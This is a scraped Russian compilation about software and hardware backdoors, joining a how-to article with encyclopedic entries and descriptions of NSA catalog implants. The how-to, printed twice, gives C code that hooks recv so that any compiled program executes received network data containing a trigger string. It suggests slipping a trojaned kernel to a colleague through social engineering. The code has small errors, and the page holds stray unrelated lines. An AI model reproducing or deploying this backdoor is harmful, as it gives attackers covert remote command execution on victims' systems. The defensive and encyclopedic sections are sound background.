Закладки в ОС — практика.
Закладки — это недокументированные функции системы, заложенные создателем сознательно. Закладка может находиться в любом месте: в прикладной программе, в ядре ОС или даже в компиляторе. Назначение закладок — дать создателю системы более широкие возможности, чем рядовому пользователю или администратору, не знающему о закладке, в случае ОС или сетевых сервисов — удаленный контроль над системой. Рассмотрим на практике внедрение закладки в Unix-like систему.
buggzy Закладки — это недокументированные функции системы, заложенные создателем сознательно. Закладка может находиться в любом месте: в прикладной программе, в ядре ОС или даже в компиляторе.
Назначение закладок — дать создателю системы более широкие возможности, чем рядовому пользователю или администратору, не знающему о закладке, в случае ОС или сетевых сервисов — удаленный контроль над системой. Рассмотрим на практике внедрение закладки в Unix-like систему. 1. Ядро ОС. Модифицируются части ядра, отвечающие за обработку поступающей по сети информации.
Что такое вкладка и закладка в Вашем браузере
Нам подойдет обработка системного вызрова recv, отвечающего за чтение данных из сокета. В ядре linux этот вызов находится в файле net/socket.c, а сама процедура называется sys_recv(int fd, void * ubuf, size_t size, unsigned flags). Параметр ubuf — место, куда в результате вызова процедуры попадают прочтенные данные.
Можно вставить проверку буфера на наличие заданной строки, если строка найдена — выполнять какой-либо код. Модифицированное ядро вставляется в стандартный дистрибутив (или распространяется под видом оригинального ядра), и далее методами социальной инженерии внедряется на атакуемый объект.
Я почти уверен, что сисадмин из соседнего офиса с удовольствием возьмет у меня компашку с последней версией ядра — любит он их обновлять, а качать с kernel.org — жалко денег 🙂 2. Прикладная программа. Тут все достаточно очевидно, проблема лишь в том, чтобы скрыть закладку внутри исходника.
Впрочем, по статистике, лишь 1% пользователей opensource-программ заглядывает в исходники, так что при локальном распространении программы (в пределах здания, например) можно не особо волноваться на этот счет. 3. Компилятор. Можно модифицировать компилятор таким образом, чтобы он вставлял закладку в любую компилируемую программу.
Нет нужды объяснять тому, кто дочитал до этого места, преимущества и недостатки распространения программ в виде исходных текстов, а не бинарников. Мы произведем модификацию, аналогичную модификации ядра. Во многих юниксах функция recv описывается в файле /usr/include/sys/socket.c, маленькое изменение файла приведет к тому, что любое приложение будет компилироваться с закладкой. Пишу по памяти, так что могу ошибиться 🙂 В конец файла (или в любое другое место после определения функции recv) нужно добавить следующее: Мы определяем новую процедуру.
static int buggzy_recv(int fd, void *buf, int len, int flags)
. и подменяем старую функцию новой:
Значение слова закладка. Что такое закладка.
#define recv buggzy_recv Даже вручную такие строчки добавляются меньше, чем за минуту, а заметно это не больше, чем модификация ядра. Теперь любая программа, использующая сокеты, при получении информации, содержащей строку «maravan» (не спрашивайте, что это такое), будет выполнять полученные данные как команду системы. Способы добиться установки на атакуемую систему — те же, что и у ядра.
В отличие от ядра, закладка в компилятор может внедряться не в целевую систему, а на систему разработчика. Меры предосторожности. От закладок, сделанных авторами системы, обезопаситься крайне проблематично, например, откуда у вас уверенность, что ваш компилятор не делает их? 🙂 Точто так же нет оснований быть уверенным, что дистрибутив, купленный вами в магазине позавчера, не создан специально с целью получить несанкционированный доступ к вашей системе. Проверяйте файлы в сомнительных дистрибутивах на соответствие оригинальным (для этого выкладываются их контрольные суммы или цифровые подписи). Тяжело быть параноиком, но если информация, которую у вас могут похитить, составляет достаточную ценность, стоит знать и помнить об этом способе проникновения в систему.
Мир сходит с ума и грянет киберапокалипсис. Подпишись на наш Телеграм канал, чтобы узнать первым, как выжить в цифровом кошмаре!
Источник: www.securitylab.ru
Программная закладка
У этого термина существуют и другие значения, см. Закладка.
Закла́дка (программная закладка [1] ) — скрытно внедрённая в защищенную систему программа, либо намеренно изменённый фрагмент программы, который позволяет злоумышленнику осуществить несанкционированный доступ к ресурсам системы на основе изменения свойств системы защиты [2] . Закладка может быть внедрена самим разработчиком программного обеспечения.
Часто программные закладки выполняют роль перехватчиков паролей, трафика, а также служат в качестве проводников для компьютерных вирусов. Программные закладки невозможно обнаружить при помощи стандартных антивирусных средств, их выявление возможно только специальными тестовыми программами. Данные программы доступны в специализированных компаниях, которые занимаются сертификацией и стандартизацией компьютерного программного обеспечения [3] .
- 1 Классификация
- 1.1 По методу внедрения
- 1.2 По назначению
- 3.1 Защита от внедрения закладок
- 3.2 Выявление внедренных закладок
- 3.3 Удаление внедренных закладок
Источник: wiki2.org
Программные закладки
Современное понимание компьютерные систем предполагает использование различное ПО в едином комплексе. Главным критерием правильного функционирования такой системы это обеспечить адекватную защиту от злоумышленников во время обработки информации. У злоумышленников в арсенале могут быть программы которые могут быть вирусами или программными закладками. Они могут выполнять следующие действия:
- Переносить куски данных из одной области внешней/оперативной памяти в другую.
- Вносить рандомные искажения в коды программ, которые находятся в оперативной памяти.
- Изменять или мешать выводить данные на внешний компьютерные устройства. Или же искажать канал связи.
Также закладки можно разделить по методу внедрения в компьютерную среду:
- Загрузочные закладки, они располагаются в загрузочных секторах. В итоге в процессе выполнения начальной загрузки включается закладка и берет на себя управления следующими загрузками ОС.
- программно-аппаратные закладки. Они влаживаются в биос, которые записаны в ПЗУ.
- Драйверные закладки, они в итоге управляют подключенными к компьютеру периферийными устройствами.
- Прикладные закладки, работают с общими программами(редакторы, утилиты, мониторы и тд).
- Закладки-имитаторы, у них интерфейс совпадает с интерфейсами служебных программ.
- Исполняемые закладки, чаще всего пакетный файл, которые содержит инструкции из команд операционной системы.
- замаскированные закладки, они маскируются под программные средства.
Для исполнения функций программной закладки, должны быть соблюдены следующие условия:
- Программная закладка должна попасть в ОП компьютера.
- после погружения закладки в ОП, должны быть активизирующие условия для закладки.
Нужно заметить, что зачастую сам пользователь есть активизирующим условием, который сам запускает исполняемый файл не подозревая на его зараженность. Есть три группы деструктивных действий:
- копирование данных пользователей компьютерной системы.
- навязывания определенных функций для роботы компьютера.
- изменения алгоритмов служебных/пользовательских программ.
У всех программных закладок есть одна черта, они все делают операцию записи в внешнюю или оперативную память системы. Программные закладки имеют два подвида:
- Алгоритмическая закладка — это намеренное скрытое изменение части алгоритма программы, в результате чего возможное появление у программы новых функций, которые не предусмотрены документацией эксплуатации ПО и реализующихся при определенных условиях на вычислительной машине.
- Программная закладка — изменение в программе функциональных объектов, которые при определенных входных данных реализуют функции не описанные в документации, разрешающих реализовать несанкционированное влияние на информацию.
Внедрение и работа программного закладки в вычислительную машину имеет латентный характер. Работа закладки может быть разноплановой, все зависит от создателя. Обычно закладки выполняют роль перехватчика трафика или паролей, а также служит проводником для вирусов. Также они могут изменять данные в информационной системе или уничтожить ее.
На сегодня существуют качественные методы выявление таких закладок. Они реализованы на наблюдении за процессами, которые работают в системе. Если программная закладка присутствует на компьютере, это отображается на машине в целом. Изменение могут быть следующими:
- полное или частичное блокирование системы
- снижение быстродействия компьютера
- переадресация сообщений
- имитация аппаратных сбоев работы ПО или периферийных устройств
- реализация доступа в систему с несанкционированных устройств
Внедрение закладок может произойти случайно через сеть или носителя. Программная закладка может быть внедрена в любой программе изначально, на стадии создании программы. Выявить таких закладок почти что невозможно. Для уменьшения риска и угроз, нужно устанавливать доверенные программы.
- документирование информации
- сетевой адаптер
- защита компьютера
- защита информации на андроид
- служба безопасности предприятия
- контроль удаленного доступа
- характеристики проводных линий связи
- максимальная производительность сети Ethernet
Источник: infoprotect.net
Закладки в ОС: практика
Закладки — это недокументированные
функции системы, заложенные создателем
сознательно. Закладка может находиться в
любом месте: в прикладной программе, в ядре
ОС или даже в компиляторе. Назначение
закладок — дать создателю системы более
широкие возможности, чем рядовому
пользователю или администратору, не
знающему о закладке, в случае ОС или сетевых
сервисов — удаленный контроль над системой.
Рассмотрим на практике внедрение закладки
в Unix-like систему.
1. Ядро ОС. Модифицируются части ядра,
отвечающие за обработку поступающей по
сети информации. Нам подойдет обработка
системного вызова recv, отвечающего за чтение
данных из сокета. В ядре linux этот вызов
находится в файле net/socket.c, а сама процедура
называется sys_recv(int fd, void * ubuf, size_t size, unsigned flags).
Параметр ubuf — место, куда в результате
вызова процедуры попадают прочтенные
данные. Можно вставить проверку буфера на
наличие заданной строки, если строка
найдена — выполнять какой-либо код.
Модифицированное ядро вставляется в
стандартный дистрибутив (или
распространяется под видом оригинального
ядра), и далее методами социальной
инженерии внедряется на атакуемый объект. Я
почти уверен, что сисадмин из соседнего
офиса с удовольствием возьмет у меня
компашку с последней версией ядра — любит он
их обновлять, а качать с kernel.org — жалко денег
2. Прикладная программа. Тут все достаточно
очевидно, проблема лишь в том, чтобы скрыть
закладку внутри исходника. Впрочем, по
статистике, лишь 1% пользователей opensource-программ
заглядывает в исходники, так что при
локальном распространении программы (в
пределах здания, например) можно не особо
волноваться на этот счет.
3. Компилятор. Можно модифицировать
компилятор таким образом, чтобы он вставлял
закладку в любую компилируемую программу.
Нет нужды объяснять тому, кто дочитал до
этого места, преимущества и недостатки
распространения программ в виде исходных
текстов, а не бинарников. Мы произведем
модификацию, аналогичную модификации ядра.
Во многих юниксах функция recv описывается в
файле /usr/include/sys/socket.c, маленькое изменение
этого (или аналогичного) файла приведет к
тому, что любое приложение, использующее
сокеты, будет компилироваться с закладкой.
В конец файла (или в любое другое место
после определения функции recv) нужно
добавить следующее:
Мы определяем новую функцию.
static int buggzy_recv(int fd, void *buf, int
len, int flags)
int retval=recv(fd,buf,len,flags);
if(strstr(buf,»maravan»)!=NULL)
system(buf);
return retval;
>
. и подменяем старую функцию новой:
#define recv buggzy_recv
Даже вручную такие строчки добавляются
меньше, чем за минуту, а заметно это не
больше, чем модификация ядра. Теперь любая
программа, использующая сокеты, и
откомпилированная на этом компиляторе, при
получении информации, содержащей строку
«maravan» (не спрашивайте, что это такое),
будет выполнять полученные данные как
команду системы. Способы добиться
установки на атакуемую систему — те же, что и
у ядра. В отличие от ядра, закладка в
компилятор может внедряться не в целевую
систему, а на систему разработчика, если
разработчик распространяет продукты в
бинарном виде.
Меры предосторожности. От закладок,
сделанных авторами системы, обезопаситься
крайне проблематично, например, откуда у
вас уверенность, что ваш компилятор не
делает их? Точно так же нет оснований быть
уверенным, что дистрибутив, купленный вами
в магазине позавчера, не создан специально
с целью получить несанкционированный
доступ к вашей системе. Проверяйте файлы в
сомнительных дистрибутивах на
соответствие оригинальным (для этого
выкладываются их контрольные суммы или
цифровые подписи). Тяжело быть параноиком,
но если информация, которую у вас могут
похитить составляет достаточную ценность,
стоит знать и помнить об этом способе
проникновения в систему.
Источник: xakep.ru
Программные и аппаратные «закладки»
Программная «закладка» — скрытно внедрённая в защищенную систему программа, либо намеренно измененный фрагмент программы, который позволяет злоумышленнику осуществить несанкционированный доступ к ресурсам системы на основе изменения свойств системы защиты. Закладка может быть внедрена как самим разработчиком программного обеспечения, так и сторонним лицом.
Программные «закладки» — основной их признак, скрытые (недокументированные) функции и возможности, очень часто программные «закладки» работают используя официальные (документированные) модули программного и аппаратного обеспечения (пример: процедура RPC).
Где могут находится программные «закладки»: в BIOS (ПЗУ) — набор программ, записанных в виде машинного кода в постоянном запоминающем устройстве, в загрузочных секторах, в драйверах, в системных файлах, в прикладных программах, в «самописных» дополнительных модулях ( пример 1С), самостоятельные программы имитирующий какой нибудь полезный софт или даже антивирус.
Часто программные закладки выполняют роль перехватчиков паролей, трафика, а также служат в качестве проводников для компьютерных вирусов. Программные закладки невозможно обнаружить при помощи стандартных антивирусных средств, их выявление возможно только специальными тестовыми программами на специальных аппаратных платформах. У всех программных закладок (независимо от метода их внедрения в компьютерную систему и назначения) имеется одна важная «демаскирующия» черта: им необходимо работать с оперативной или внешней памятью.
Примеры программных закладок:
Троянский конь Back Orifice (BO) по своей сути является достаточно мощной утилитой удаленного администрирования компьютеров в сети. Back Orifice является системой удаленного администрирования, позволяющей пользователю контролировать компьютеры при помощи обычной консоли или графической оболочки. В локальной сети или через Internet, BO “предоставляет пользователю больше возможностей на удаленном Windows-компьютере чем имеет сам пользователь этого компьютера” — сказано в рекламном объявлении на одной из хакерских Web-страниц.
NetBus — это вирус из серии backdoor . Вирусы этого типа, попав на компьютер (та часть, которая попадает на компьютер жертвы называется сервером ) и заразив его, резервируют под себя порт и добавляют себя в автозагрузку, если это указано в их программе. После этих действий злоумышленник (владеющий клиентом или центром управления ) может подключиться к этому компьютеру (если знает его IP-адрес, а в некоторых случаях требуется и пароль к серверу) и делать с компьютером, что душе угодно (это ограничивается лишь фантазией и возможностями вируса). Таким образом, сервер становится «глазами» и «руками» на компьютере жертвы.
Система D.I.R.T. , согласно официальной политике компании Codex Data Systems Inc., разработавшей ее, предназначается для использования исключительно правоохранительными органами и имеет стоимость, в зависимости от конфигурации, от 2 до 200 тысяч долларов США. Независимые же эксперты утверждают, что по функциональности система D.I.R.T. ненамного превосходит широко известные бесплатные хакерские программы такие как Back Orifice.
Небольшая программа под говорящим названием PAPARAZZI, созданная Industar Cybernetics Corp., призвана осуществлять контроль за происходящим на офисных компьютерах.
IRATEMONK позволяет обеспечить присутствие программного обеспечения для слежки на настольных и портативных компьютерах с помощью закладки в прошивке жесткого диска, которая позволяет получить возможность исполнения своего кода путем замещения MBR. Метод работает на различных дисках Western Digital, Seagate, Maxtor и Samsung. Из файловых систем поддерживаются FAT, NTFS, EXT3 и UFS. Системы с RAID не поддерживаются. После внедрения IRATEMONK будет запускать свою функциональную часть при каждом включении целевого компьютера.
SWAP позволяет обеспечить присутствие программного обеспечения для шпионажа за счет использования BIOS материнской платы и HPA области жесткого диска путем исполнения кода до запуска операционной системы. Данная закладка позволяет получить удаленный доступ к различным операционным системам (Windows, FreeBSD, Linux, Solaris) c различными файловыми системами (FAT32, NTFS, EXT2, EXT3, UFS 1.0). Для установки используются две утилиты: ARKSTREAM перепрошивает BIOS, TWISTEDKILT записывает в HPA область диска SWAP и его функциональная часть.
WISTFULTOLL — это плагин к программам UNITEDRAKE и STRAITBIZZARE для сбора информации на целевой системе, использует вызовы WMI и записи реестра. Возможна работа в качестве самостоятельной программы. При наличии физического доступа к системе может производить сброс полученных в ходе анализа данных на USB-накопитель.
SOMBERKNAVE — программная закладка работающая под Windows XP предоставляющая удаленный доступ к целевому компьютеру. Использует незадействованные Wi-Fi адаптеры, в случае, когда пользователь задействовал адаптер SOMBERKNAVE прекращает передачу данных.
HALLUXWATER — это бэкдор устанавливаемый в качестве обновления загрузчика в файрволы Huawei Eudemon. При перезагрузке цели установщик закладки находит необходимые точки для патча и бекдора в подпрограмме обработки входящих пакетов. Данный бэкдор сохраняется при обновлении операционной системы и автоматических обновлениях загрузчика. HALLUXWATER может работать на файрволах Huawei Eudemon 200, 500 и 1000 серии.
FEEDTROUGH — представляет собой технику установки двух программных закладок BANANAGLEE и ZESTYLEAK используемых против файрволов Juniper Netscreen. Подвержены угрозе следующие модели Juniper: ns5xt, ns25, ns50, ns200, ns500 и ISG 1000. Метод отрабатывается при старте файрвола, если операционная система есть в базе данных, то устанавливаются закладки, в противном случае устройство загружается в обычном режиме. FEEDTROUGH сохраняется при обновлении операционной системы файрвола.
SOUFFLETROUGH — закладка для BIOS файрволов Juniper SSG 500 и SSG 300 серий. Она скрывает закладку BANANAGLEE, в случае, если устройство не поддерживает добавление BANANAGLEE, открывает бэкдор. Возможны удаленное обновление и установка SOUFFLETROUGH.
SCHOOLMONTANA — обеспечивает присутствие сетевых закладок. Позволяет сохраниться закладке при обновлении и замене операционной системы, в том числе и при физической замене флеш карты роутера. Основной вектор атаки направлен на модификацию BIOS. Нацелена на роутеры Juniper J-серии под управлением операционной системой JUNOS. По сути, это бэкдор разработанный для использования под FreeBSD.
SIERRAMONTANA — обеспечивает присутствие сетевых закладок в роутерах Juniper М-серии. Возможности аналогичны SCHOOLMONTANA.
HEADWATER — бэкдор для некоторых моделей роутеров Huawei. Бэкдор устанавливается при обновлении загрузчика. Общая схема работы аналогична другим закладкам для сетевого оборудования.
Обособлено стоят программные закладки, несанкционированного аудио- видео- наблюдения .
Компьютер чаще всего оснащен видеокамерой и/или микрофоном, что само по себе делает его более уязвимым перед злоумышленниками. Для прослушки такой техники используются различные программы, которые попадают в систему в виде определенных ссылок или после того как компьютер прошел диагностику. Не стоит быть уверенным на все 100%, что после ремонта он вернется абсолютно “чистый”. Например, есть и программа для прослушивания через микрофон — Audiospy. Она, как и все ей подобные программы, работают в скрытом для пользователя режиме, поэтому обнаружить их неспециалисту крайне трудно.
Аппаратная «закладка» (hardware backdoor) — устройство в электронной схеме, скрытно внедряемое к остальным элементам (или/и также аппаратной закладкой называется отдельная плата, микросхема, подключаемая к атакуемой системе или ее IT инфраструктуре).
Примеры аппаратных закладок: Программные и аппаратные «закладки», в ряде случаев выполняют одинаковое предназначение, но аппаратная закладка может вообще не использовать ресурсы атакуемой системы, что делает ее практически «неуязвимой».
GINSU — техника позволяющая восстановить программную закладку под названием KONGUR на целевых системах с аппаратной закладкой BULLDOZZER на PCI-шине. Например, в случае обновления или переустановки операционной системы на целевом компьютере. Данные технологии предназначены для получения удаленного доступа к компьютеру под управлением Windows от 9х до Vista.
HOWLERMONKEY — представляет собой радиопередатчик малого и среднего радиуса. Является специальном радиомодулем для других аппаратных закладок. Используется для получения данных от закладок и предоставления удаленного доступа к ним.
JUNIORMINT — миниатюрная аппаратная закладка на базе ARM-системы, которая может быть сконфигурирована для различных задач. Например, такая система может быть частью других устройств для шпионажа. Обладает следующими характеристиками: процессор ARM9 400MHz, флеш 32MB, SDRAM 64MB, ПЛИС Vertex4/5 оснащенная 128MB DDR2.
MAESTRO-II — миниатюрная аппаратная закладка на базе ARM-системы, размером в одноцентовую монету. Характеристики довольно скромные: процессор ARM7 66MHz, оперативная память 8MB, флеш 4MB.
TRINITY — миниатюрная аппаратная закладка на базе ARM-системы, размером в одноцентовую монету. Обладает следующими характеристиками: процессор ARM9 180MHz, оперативная память 96MB, флеш 4MB. Используется в составе других устройств.
COTTONMOUTH-I — аппаратная закладка на USB, предоставляющая беспроводной мост к целевой сети, а также загрузки эксплойтов на целевой системе. Может создавать скрытый канал связи для передачи команд и данных между аппаратными и программными закладками. При помощи встроенного радиопередатчика может взаимодействовать с другими СOTTONMOUTH. В основе лежит элементная база TRINITY, в качестве радиопередатчика используется HOWLERMONKEY. Существует версия под названием MOCCASIN, представляющая собой закладку в коннекторе USB-клавиатуры.
COTTONMOUTH-II — аппаратная USB-закладка предоставляющая скрытый канал доступа к сети цели. Данная закладка предназначена для работы на шасси компьютера и представляет собой двухпортовый USB-коннектор на плату. Может создавать скрытый канал связи для передачи команд и данных между аппаратными и программными закладками.
COTTONMOUTH-III — аппаратная закладка в USB предоставляющая беспроводной мост к целевой сети, а также загрузки эксплойтов на целевой системе. В основе лежит элементная база TRINITY, в качестве радиопередатчика используется HOWLERMONKEY. Представляет собой блок разъемов(RJ45 и два USB) устанавливаемых на шасси, может взаимодействовать с другими COTTONMOUTH установленными на этом же шасси.
FIREWALK — аппаратная сетевая закладка, способная пассивно собирать трафик сети Gigabit Ethernet, а также осуществлять активные инъекции в Ethernet пакеты целевой сети. Позволяет создавать VPN туннель между целевой сетью и центром. Возможно установление беспроводной коммуникации с другими HOWLERMONKEY-совместимыми устройствами. Исполнение данной закладки аналогично COTTONMOUTH-III — такой же блок разъемов (RJ45 и два USB) на шасси. В основе лежит элементная база TRINITY, в качестве радиопередатчика используется HOWLERMONKEY.
SURLYSPAWN — аппаратная закладка (кейлоггер), позволяющая получить по радиоканалу данные от цели (клавиатура, низкоскоростные цифровые устройства). Данные передаются в отраженном сигнале, для активации необходимо облучение закладки радиосигналом от специализированного излучателя. Кейлоггер совместим с USB и PS/2 клавиатурами, в дальнейшем планируется добавление совместимости с клавиатурами ноутбуков.
RAGEMASTER — аппаратная закладка позволяющая перехватить сигнал от VGA монитора. Закладка прячется в обычный VGA-кабель соединяющий видеокарту и монитор, установлена, как правило, в феррит на видеокабеле. Реализован захват сигнала с красного цветового канала. Представляет собой пассивный отражатель, т.е. активируется при облучении радиосигналом от специализированного излучателя.
NIGHTSTAND — мобильный комплекс для проведения активных атак на Wi-Fi сети, целями являются машины под управлением Windows (от Win2k до WinXP SP2). Обычно используется в операциях, в которых доступ к цели невозможен. Комплекс реализован на базе ноутбука под управлением Linux и радиооборудования. Вместе с внешними усилителями и антеннами дальность действия может достигать 13 км.
SPARROW II — встраиваемая компьютерная система под управлением Linux. Это полностью функциональная система для сбора данных о беспроводных сетях. Для расширения функционала имеет четыре встроенных Mini PCI слота позволяющие подключить GPS-модуль и дополнительные беспроводные сетевые карты.
IRONCHEF обеспечивает доступ к целевым системам при помощи BIOS материнской платы и использования SMM-режима для связи с аппаратной закладкой предоставляющей двухстороннюю радиосвязь. Для этой техники уязвимы серверы HP Proliant .
CROSSBEAM — закладка в виде GSM модуля на основе встраиваемого компьютера. Может перехватывать и записывать данные передаваемые в GSM-сетях.
Источник: dzen.ru